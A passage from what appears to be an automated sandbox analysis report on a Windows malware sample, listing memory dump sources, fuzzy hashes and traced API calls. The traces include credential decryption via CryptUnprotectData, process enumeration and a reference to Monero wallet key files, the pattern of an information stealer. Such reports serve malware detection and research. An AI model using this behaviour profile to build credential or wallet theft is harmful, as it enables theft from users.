                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #<~u$=O_$LJ4g$O&Ow$~^|
                        • API String ID: 0-913667623
                        • Opcode ID: 350c2d653bd42655cbd20a8339a5ef6d50dd1d75544cd786a3c71b14bb995358
                        • Instruction ID: 591b5d5ac755124e310eda916227ca4d7caa71969eee64d9834aa0477f64c3e9
                        • Opcode Fuzzy Hash: 350c2d653bd42655cbd20a8339a5ef6d50dd1d75544cd786a3c71b14bb995358
                        • Instruction Fuzzy Hash: 51A217F3A082109FE704AE2DEC4567AFBE5EF94320F1A493DEAC4C7744E63598058796
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E2C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E2C87C
                        • lstrcat.KERNEL32(?,00E40B46), ref: 00E2C943
                        • lstrcat.KERNEL32(?,00E40B47), ref: 00E2C957
                        • lstrcat.KERNEL32(?,00E40B4E), ref: 00E2C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 8bcb03e588a1391ad692422eab7c35b3248e27a5104907f49e9fb500ea177822
                        • Instruction ID: 2390e59de9cad020648819628b8e8865a7d5e249e82ecbbf8c8daffd4ee0bef1
                        • Opcode Fuzzy Hash: 8bcb03e588a1391ad692422eab7c35b3248e27a5104907f49e9fb500ea177822
                        • Instruction Fuzzy Hash: 4841737590421ADFCB20DFA4DD89BEEB7B8BB88704F1045A8F509B7280D7755A84CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E2724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E27281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E272A4
                        • LocalFree.KERNEL32(?), ref: 00E272AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: c469f37cb3e57a1a39f0e145dc2195ced38ab77d68e9c798db2a048c6cc7211b
                        • Instruction ID: b9d1a500098c2a8d198458b6ceffab84efb9e3b61516583ef82214651a5fe3ab
                        • Opcode Fuzzy Hash: c469f37cb3e57a1a39f0e145dc2195ced38ab77d68e9c798db2a048c6cc7211b
                        • Instruction Fuzzy Hash: 1F0100B5B40208FBDB20DFD4DD46F9E7778AB44704F104158FB45BB2C4D675AA018B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E3961E
                        • Process32First.KERNEL32(00E40ACA,00000128), ref: 00E39632
                        • Process32Next.KERNEL32(00E40ACA,00000128), ref: 00E39647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00E3965C
                        • CloseHandle.KERNEL32(00E40ACA), ref: 00E3967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 50a319423651f3ecdcc53706f5c364b31ca28c51daad3a23cdec3865882a3ed9
                        • Instruction ID: 79ab6df1d0dcc5acf6daa8825eabe2d005297f25affc8f7e2669b543e007a352
                        • Opcode Fuzzy Hash: 50a319423651f3ecdcc53706f5c364b31ca28c51daad3a23cdec3865882a3ed9
                        • Instruction Fuzzy Hash: C7010C75A01208EFCB24EFA5C949BEDBBF8FB48300F104188E94AA7251D779AB44DF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: :$/G$@lz5$AR7o$rr~
                        • API String ID: 0-3404655268
                        • Opcode ID: 9353ef00e74c87d111c644eab1ecb4d90608e5a5541274c47e038a5a75e63f21
                        • Instruction ID: c8ef7bc47483649ce6d031b7467d42ad95a5ec8cb27326ca81e240ed4f439544
                        • Opcode Fuzzy Hash: 9353ef00e74c87d111c644eab1ecb4d90608e5a5541274c47e038a5a75e63f21
                        • Instruction Fuzzy Hash: F0B21AF360C2049FE304AE2DEC8567ABBE9EF94720F1A453DE6C4C3744EA3598058796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ddoz$Hdoz$'+/$Ts}
                        • API String ID: 0-3368254143
                        • Opcode ID: d5b609fb3cf3bcf398781cd093dd550bdb89414af19ea41ab7b7f8284890dc34
                        • Instruction ID: c824fa5aeb119f6347a1dcfea8d6119d8ea0152259a1c56f6c8c93daee30f305
                        • Opcode Fuzzy Hash: d5b609fb3cf3bcf398781cd093dd550bdb89414af19ea41ab7b7f8284890dc34
                        • Instruction Fuzzy Hash: B0B216F3A0C2049FE3046E2DEC8567AFBE9EB94720F16493DEAC4C7744EA3558058697
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E405B7), ref: 00E386CA
                        • Process32First.KERNEL32(?,00000128), ref: 00E386DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00E386F3
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • CloseHandle.KERNEL32(?), ref: 00E38761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 509c9e9099747b4f38356ea24d0881d65c6458a96703365d86fb35b356ba03cc
                        • Instruction ID: 1f8b70e4795873e8f4932c1bb409f565ee7a464dfa2fd9149e1115084c93660b
                        • Opcode Fuzzy Hash: 509c9e9099747b4f38356ea24d0881d65c6458a96703365d86fb35b356ba03cc
                        • Instruction Fuzzy Hash: 41314F71901218EBCB24EF54DD49FEEBBB8EB45700F1051A9F10AB2190DB346A85CFA1
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00E25184,40000001,00000000,00000000,?,00E25184), ref: 00E38EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 89580eafe3baf87ead70e819ee92ffbbe9b5f663b1da9dd02dac53efa634368b
                        • Instruction ID: f089222ea0ab115ab15049d2120b07c148394b845194ae4b63296757a15931ef
                        • Opcode Fuzzy Hash: 89580eafe3baf87ead70e819ee92ffbbe9b5f663b1da9dd02dac53efa634368b
                        • Instruction Fuzzy Hash: CF110674300308EFDB04DF64D988FAA3BA9AF89314F10A558F9199B250DB36ED41DB60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E40E00,00000000,?), ref: 00E379B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E379B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00E40E00,00000000,?), ref: 00E379C4
                        • wsprintfA.USER32 ref: 00E379F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 21e8b25940d429a1e4106f88ac8ec49064db98179fd0a3905b6d86962571067d
                        • Instruction ID: a4379a3fb31e59c4f0fe0f2044f4986bbff758a5347fba97bdc9fd8597d3f413
                        • Opcode Fuzzy Hash: 21e8b25940d429a1e4106f88ac8ec49064db98179fd0a3905b6d86962571067d
                        • Instruction Fuzzy Hash: F31118B2A04118EACB249FC9D945BBEBBF8EB4CB11F10411AF645B2284D2395940C7B0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0196F6A8,00000000,?,00E40E10,00000000,?,00000000,00000000), ref: 00E37A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0196F6A8,00000000,?,00E40E10,00000000,?,00000000,00000000,?), ref: 00E37A7D
                        • wsprintfA.USER32 ref: 00E37AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: fe4dfed5bde3e9a99ae5280860017987d8c565b26cd6f6defd1cf850a1834c61
                        • Instruction ID: 8fe3723b80176e50bd1f3972b3febc44d4612ee0291fc98d2c9aba75d91fcf96
                        • Opcode Fuzzy Hash: fe4dfed5bde3e9a99ae5280860017987d8c565b26cd6f6defd1cf850a1834c61
                        • Instruction Fuzzy Hash: 9E115EB1A45218EFEB209B54DC49FA9BB78FB44721F10439AE91AA32C0D7795E40CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ]h6U$kHsv$=>
                        • API String ID: 0-1642610169
                        • Opcode ID: 82a951ead271a73c4ffd52a099c7542d253039d0ef12b24bdf7bfd72c26b4e7a
                        • Instruction ID: 540b3696e83c3640493a86e61a2cc8c4758bc6f357e13c327a79adcd9ca50e54
                        • Opcode Fuzzy Hash: 82a951ead271a73c4ffd52a099c7542d253039d0ef12b24bdf7bfd72c26b4e7a
                        • Instruction Fuzzy Hash: 05B23AF3A0C2149FE304AE2DEC8567ABBE9EF94320F1A453DEAC4D3744E93558048796
                        APIs
                        • CoCreateInstance.COMBASE(00E3E118,00000000,00000001,00E3E108,00000000), ref: 00E33758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E337B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 279148a20ba6482877a80c1ba8a4f752a071697247bb026a959978daa7b10cd8
                        • Instruction ID: 70d5cf00fb46ae1164d8dc594b88dde3762b442106e8ca480421751b3463f2e4
                        • Opcode Fuzzy Hash: 279148a20ba6482877a80c1ba8a4f752a071697247bb026a959978daa7b10cd8
                        • Instruction Fuzzy Hash: DF41C770A40A289FDB24DB58CC99F9BB7B5BB48702F4051D8E609A72D0D7B16E85CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E29B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E29BA3
